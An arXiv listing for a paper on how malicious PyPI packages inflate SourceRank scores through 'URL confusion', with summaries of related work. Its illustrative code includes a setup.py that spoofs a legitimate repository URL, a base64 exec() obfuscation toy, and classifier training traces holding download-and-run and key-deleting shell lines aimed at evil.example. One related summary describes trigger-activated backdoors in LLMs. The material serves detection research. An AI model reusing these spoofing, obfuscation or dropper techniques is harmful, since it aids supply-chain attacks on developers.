SourceBroken: A large-scale analysis on the (un)reliability of SourceRank in the PyPI ecosystem
- URL: http://arxiv.org/abs/2512.24400v1
- Date: Tue, 30 Dec 2025 18:34:07 GMT
- Title: SourceBroken: A large-scale analysis on the (un)reliability of SourceRank in the PyPI ecosystem
- Authors: Biagio Montaruli, Serena Elisa Ponta, Luca Compagna, Davide Balzarotti
- Abstract summary: SourceRank is a scoring system made of 18 metrics that assess the popularity and quality of open-source packages. We propose a threat model that identifies potential evasion approaches for each metric, including the URL confusion technique. We study the reliability of SourceRank in the PyPI ecosystem by analyzing the SourceRank distributions of benign and malicious packages.
- Score: 10.03632278118504
- License: http://creativecommons.org/licenses/by/4.0/
- Abstract: SourceRank is a scoring system made of 18 metrics that assess the popularity and quality of open-source packages. Although it has been used in several recent studies, none has thoroughly analyzed its reliability against evasion attacks aimed at inflating the score of malicious packages, thereby making them appear trustworthy. To fill this gap, we first propose a threat model that identifies potential evasion approaches for each metric, including the URL confusion technique, which can affect 5 out of the 18 metrics by leveraging a URL that points to a legitimate repository potentially unrelated to the malicious package. Furthermore, we study the reliability of SourceRank in the PyPI ecosystem by analyzing the SourceRank distributions of benign and malicious packages in the state-of-the-art MalwareBench dataset, as well as in a real-world dataset of 122,398 packages. Our analysis reveals that, while historical data suggests a clear distinction between benign and malicious packages, the real-world distributions overlap significantly, mainly because SourceRank fails to reflect package removals in a timely manner. As a result, SourceRank cannot be reliably used to discriminate between benign and malicious packages in real-world scenarios, nor to select benign packages among those available on PyPI. Finally, our analysis reveals that URL confusion represents an emerging attack vector, with its prevalence increasing from 4.2% in MalwareBench to 7.0% in our real-world dataset. Moreover, this technique is often used alongside other evasion techniques and can significantly inflate the SourceRank metrics of malicious packages.
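To make the URL confusion technique concrete, the sketch below shows the metadata of a hypothetical package whose repository URL points at a popular, legitimate project it has nothing to do with; repository-derived metrics are then computed against that legitimate project. The package name and setup.py contents are invented for illustration.

```python
# setup.py of a hypothetical package illustrating URL confusion:
# the metadata claims a popular, unrelated repository as its source,
# so repository-based metrics get computed against that project.
from setuptools import setup

setup(
    name="totally-harmless-utils",  # hypothetical package name
    version="0.1.0",
    description="Convenience helpers",
    # Legitimate, well-known repository that is unrelated to this package:
    url="https://github.com/psf/requests",
    project_urls={
        "Homepage": "https://github.com/psf/requests",
        "Source": "https://github.com/psf/requests",
    },
)
```

Nothing in the packaging pipeline verifies that a package's code actually lives in the repository it claims, which is how, per the abstract, 5 of the 18 metrics can be affected by a single spoofed URL.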
Related papers
- Why Authors and Maintainers Link (or Don't Link) Their PyPI Libraries to Code Repositories and Donation Platforms [83.16077040470975]
Metadata of libraries on the Python Package Index (PyPI) plays a critical role in supporting the transparency, trust, and sustainability of open-source libraries. This paper presents a large-scale empirical study combining two targeted surveys sent to 50,000 PyPI authors and maintainers. We analyze more than 1,400 responses using large language model (LLM)-based topic modeling to uncover key motivations and barriers related to linking repositories and donation platforms.
arXiv Detail & Related papers (2026-01-21T16:13:57Z)
- One Detector Fits All: Robust and Adaptive Detection of Malicious Packages from PyPI to Enterprises [10.03632278118504]
We introduce a robust detector capable of seamless integration into both public repositories like PyPI and enterprise ecosystems. To ensure robustness, we propose a novel methodology for generating adversarial packages using fine-grained code obfuscation (a toy illustration follows this entry). The detector keeps the time budget for reviewing false positives to a few minutes.
arXiv Detail & Related papers (2025-12-03T23:53:56Z)
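As a toy illustration of string-level obfuscation (the summary does not disclose the paper's actual methodology, so this is only a generic example), the snippet below rewrites a harmless statement so that its literal text no longer appears in the source:

```python
# Toy string-level obfuscation: the original statement no longer appears
# verbatim in the file, so naive signature matching on the source misses it.
import base64

original = "print('hello from payload')"  # stands in for any flagged snippet
encoded = base64.b64encode(original.encode()).decode()

# The obfuscated file would contain only this line:
obfuscated_line = f"exec(__import__('base64').b64decode('{encoded}').decode())"

print(obfuscated_line)  # what a source scanner would see
exec(obfuscated_line)   # behaves exactly like the original statement
```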
- Towards Classifying Benign And Malicious Packages Using Machine Learning [2.8630136355252582]
Malicious open-source package detection typically requires static analysis, dynamic analysis, or both. Current dynamic analysis tools lack an automatic method to differentiate malicious packages from benign ones. We propose an approach that extracts features from dynamic analysis (e.g., executed commands) and leverages machine learning techniques to automatically classify packages as benign or malicious (a minimal sketch follows this entry).
arXiv Detail & Related papers (2025-11-19T01:59:11Z)
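The following sketch shows one generic way to realize this idea: vectorizing the commands observed during dynamic analysis and training an off-the-shelf classifier. The command traces and labels are synthetic stand-ins, not the paper's dataset.

```python
# Minimal sketch: classify packages from dynamically observed commands.
# Traces and labels below are synthetic stand-ins for real sandbox output.
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.ensemble import RandomForestClassifier
from sklearn.pipeline import make_pipeline

traces = [
    "pip install . && python setup.py",            # benign-looking
    "curl http://evil.example/payload.sh | sh",    # dropper pattern
    "pytest -q",                                   # benign test run
    "base64 -d /tmp/blob | sh && rm -rf ~/.ssh",   # suspicious chain
]
labels = [0, 1, 0, 1]  # 0 = benign, 1 = malicious

model = make_pipeline(
    CountVectorizer(token_pattern=r"[^\s]+"),      # one token per shell word
    RandomForestClassifier(n_estimators=100, random_state=0),
)
model.fit(traces, labels)
print(model.predict(["wget http://evil.example/x.sh | sh"]))
```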
- Conformal Prediction for Multi-Source Detection on a Network [59.17729745907474]
We study the multi-source detection problem: given snapshot observations of node infection status on a graph, estimate the set of source nodes that initiated the propagation. We propose a novel conformal prediction framework that provides statistically valid recall guarantees for source set detection (a generic construction is sketched after this entry).
arXiv Detail & Related papers (2025-11-12T01:09:56Z)
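The summary does not spell out the construction, so the sketch below shows a standard split-conformal recipe for a recall guarantee: calibrate a score threshold on held-out cascades with known sources so that, with probability at least 1 - alpha, every true source of a new cascade scores above it. The scoring function and calibration data are placeholders.

```python
# Split-conformal threshold for source-set recall (generic sketch).
import numpy as np

rng = np.random.default_rng(0)

def source_scores_for(cascade):
    """Placeholder: per-node 'likely source' scores from any base method."""
    return rng.uniform(size=50)

# Calibration: for each cascade with known sources, record the *lowest*
# score among its true sources; recall fails iff the threshold exceeds it.
calib_min_scores = []
for cascade, true_sources in [(None, [3, 17]), (None, [8]), (None, [1, 4, 9])]:
    s = source_scores_for(cascade)
    calib_min_scores.append(min(s[v] for v in true_sources))

alpha = 0.1
n = len(calib_min_scores)
# Lower quantile so that P(all true sources >= threshold) >= 1 - alpha.
k = max(int(np.floor(alpha * (n + 1))) - 1, 0)
threshold = np.sort(calib_min_scores)[k]

# Prediction set for a new cascade: every node scoring above the threshold.
new_scores = source_scores_for(None)
predicted_sources = np.flatnonzero(new_scores >= threshold)
print(threshold, predicted_sources[:10])
```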
- Detecting Malicious Source Code in PyPI Packages with LLMs: Does RAG Come in Handy? [6.7341750484636975]
Malicious software packages in open-source ecosystems, such as PyPI, pose growing security risks. In this work, we empirically evaluate the effectiveness of Large Language Models (LLMs), Retrieval-Augmented Generation (RAG), and few-shot learning for detecting malicious source code.
arXiv Detail & Related papers (2025-04-18T16:11:59Z)
- Lie Detector: Unified Backdoor Detection via Cross-Examination Framework [68.45399098884364]
We propose a unified backdoor detection framework in the semi-honest setting. Our method achieves superior detection performance, improving accuracy by 5.4%, 1.6%, and 11.9% over SoTA baselines. Notably, it is the first to effectively detect backdoors in multimodal large language models.
arXiv Detail & Related papers (2025-03-21T06:12:06Z)
- A Machine Learning-Based Approach For Detecting Malicious PyPI Packages [4.311626046942916]
In modern software development, the use of external libraries and packages is increasingly prevalent. This reliance on reused code exposes deployed software to serious risks in the form of malicious packages. We propose a data-driven approach that uses machine learning and static analysis to examine a package's metadata, code, files, and textual characteristics (a bare-bones sketch follows this entry).
arXiv Detail & Related papers (2024-12-06T18:49:06Z)
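A bare-bones version of such a pipeline might hand-craft a few metadata and code features and feed them to a linear classifier. The features and toy data below are invented for illustration and are not the paper's feature set.

```python
# Minimal sketch: hand-crafted static/metadata features -> linear classifier.
import numpy as np
from sklearn.linear_model import LogisticRegression

def featurize(pkg):
    """pkg: dict with simple metadata and source statistics (illustrative)."""
    return [
        len(pkg.get("description", "")),   # metadata richness
        int(bool(pkg.get("homepage"))),    # has a homepage URL
        pkg.get("num_files", 0),           # package size proxy
        pkg["source"].count("base64"),     # obfuscation hint
        pkg["source"].count("subprocess"), # command-execution hint
    ]

packages = [
    {"description": "HTTP helpers", "homepage": "https://example.org",
     "num_files": 40, "source": "import requests"},
    {"description": "", "homepage": None, "num_files": 2,
     "source": "import base64, subprocess"},
]
labels = [0, 1]  # 0 = benign, 1 = malicious

X = np.array([featurize(p) for p in packages], dtype=float)
clf = LogisticRegression().fit(X, labels)
print(clf.predict(X))
```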
- Uncertainty is Fragile: Manipulating Uncertainty in Large Language Models [79.76293901420146]
Large Language Models (LLMs) are employed across various high-stakes domains, where the reliability of their outputs is crucial. Our research investigates the fragility of uncertainty estimation and explores potential attacks. We demonstrate that an attacker can embed a backdoor in LLMs, which, when activated by a specific trigger in the input, manipulates the model's uncertainty without affecting the final output.
arXiv Detail & Related papers (2024-07-15T23:41:11Z)
- A Large-scale Fine-grained Analysis of Packages in Open-Source Software Ecosystems [13.610690659041417]
Malicious packages contain less metadata and use fewer static and dynamic functions than legitimate ones. Even a single dimension of the fine-grained information (FGI) provides enough discriminative power to detect malicious packages.
arXiv Detail & Related papers (2024-04-17T15:16:01Z)
- RAIN: RegulArization on Input and Network for Black-Box Domain Adaptation [80.03883315743715]
Source-free domain adaptation transfers the source-trained model to the target domain without exposing the source data. This paradigm is still at risk of data leakage due to adversarial attacks on the source model. We propose a novel approach named RAIN (RegulArization on Input and Network) for black-box domain adaptation that applies regularization at both the input level and the network level.
arXiv Detail & Related papers (2022-08-22T18:18:47Z) - Byzantine-Robust Online and Offline Distributed Reinforcement Learning [60.970950468309056]
We consider a distributed reinforcement learning setting where multiple agents explore the environment and communicate their experiences through a central server.
An $\alpha$-fraction of the agents are adversarial and can report arbitrary fake information.
We seek to identify a near-optimal policy for the underlying Markov decision process in the presence of these adversarial agents.
arXiv Detail & Related papers (2022-06-01T00:44:53Z)
- Learning while Respecting Privacy and Robustness to Distributional Uncertainties and Adversarial Data [66.78671826743884]
A distributionally robust optimization framework is considered for training a parametric model. The objective is to endow the trained model with robustness against adversarially manipulated input data. The proposed algorithms offer this robustness with little computational overhead.
arXiv Detail & Related papers (2020-07-07T18:25:25Z)